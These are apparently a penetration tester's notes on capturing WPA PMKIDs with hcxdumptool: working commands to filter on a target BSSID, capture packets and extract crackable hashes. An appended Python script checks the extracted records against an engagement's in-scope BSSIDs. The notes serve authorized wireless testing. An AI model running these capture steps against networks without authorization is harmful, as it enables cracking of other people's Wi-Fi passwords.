hcxdumptool
This tool is awesome for wifi shenanigans.
info
For now I'm just dumping notes I gathered from a recent engagement where I needed to use this tool to capture/extract/crack PMKIDs.
Basic run of the tool
hcxdumptool -i NAME-OF-WIFI-INTERFACE
tip
Don't put the interface into monitor mode first!
Once you see the BSSID you want to grab PMKIDs from, you need to build a Berkeley Packet Filter (BPF), which was (simple as it may be to others) confusing to me. But here's the skinny (112233445566 stands in for the target BSSID).
hcxdumptool --bpfc="wlan addr1 112233445566 or wlan addr2 112233445566 or wlan addr3 112233445566" > attack.bpf
Capture away!
hcxdumptool -i NAME-OF-PHYSICAL-WIFI-INTERFACE --bpf=attack.bpf -w output.pcapng --rds=1 -F
Extract away!
hcxpcapngtool -o pmkid.txt output.pcapng
And then follow this. This page is a work in progress.
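A check worth running on pmkid.txt before doing anything else with it, as an added example that is not part of the original notes: it summarises what was extracted per access point and flags any BSSID that is outside the engagement scope, which is what the BPF filter above is meant to guarantee. It assumes pmkid.txt uses the hashcat 22000 line format (`WPA*01*...` for PMKID, `WPA*02*...` for EAPOL) written by `hcxpcapngtool -o`; the sample lines, ESSIDs and function names are constructed for illustration.

```python
import re
from collections import defaultdict

HEX12 = re.compile(r"^[0-9a-fA-F]{12}$")   # MAC address without separators
HEX32 = re.compile(r"^[0-9a-fA-F]{32}$")   # PMKID or MIC

# Constructed sample lines, not real captures.
SAMPLE = """\
WPA*01*00112233445566778899aabbccddeeff*112233445566*aabbccddeeff*436f72704e6574***
WPA*01*ffeeddccbbaa99887766554433221100*112233445566*0a0b0c0d0e0f*436f72704e6574***
WPA*02*0123456789abcdef0123456789abcdef*665544332211*aabbccddeeff*4775657374*00*00*02
not a hash line
"""

def fmt_mac(h):
    return ":".join(h[i:i + 2] for i in range(0, 12, 2)).lower()

def parse_line(line):
    """Return a dict for one 22000-format line, or None if it is malformed."""
    f = line.strip().split("*")
    if len(f) < 6 or f[0] != "WPA" or f[1] not in ("01", "02"):
        return None
    if not (HEX32.match(f[2]) and HEX12.match(f[3]) and HEX12.match(f[4])):
        return None
    try:
        essid = bytes.fromhex(f[5]).decode("utf-8", errors="replace")
    except ValueError:
        return None
    kind = "PMKID" if f[1] == "01" else "EAPOL"
    return {"kind": kind, "ap": fmt_mac(f[3]), "client": fmt_mac(f[4]), "essid": essid}

def summarize(text):
    """Group records by AP: ESSID, count per record type, distinct clients."""
    report = defaultdict(lambda: {"essid": None, "PMKID": 0, "EAPOL": 0, "clients": set()})
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        entry = report[rec["ap"]]
        entry["essid"] = rec["essid"]
        entry[rec["kind"]] += 1
        entry["clients"].add(rec["client"])
    return dict(report)

def out_of_scope(report, allowed_bssids):
    """BSSIDs present in the file that are not on the engagement's allow list."""
    allowed = {b.lower() for b in allowed_bssids}
    return sorted(ap for ap in report if ap not in allowed)

if __name__ == "__main__":
    rep = summarize(SAMPLE)   # in practice: open("pmkid.txt").read()
    for ap, e in rep.items():
        print(ap, e["essid"], "PMKID:", e["PMKID"], "EAPOL:", e["EAPOL"])
    print("out of scope:", out_of_scope(rep, ["11:22:33:44:55:66"]))
```

A non-empty out-of-scope list means the filter did not restrict the capture as intended, and those records should be dropped rather than processed further.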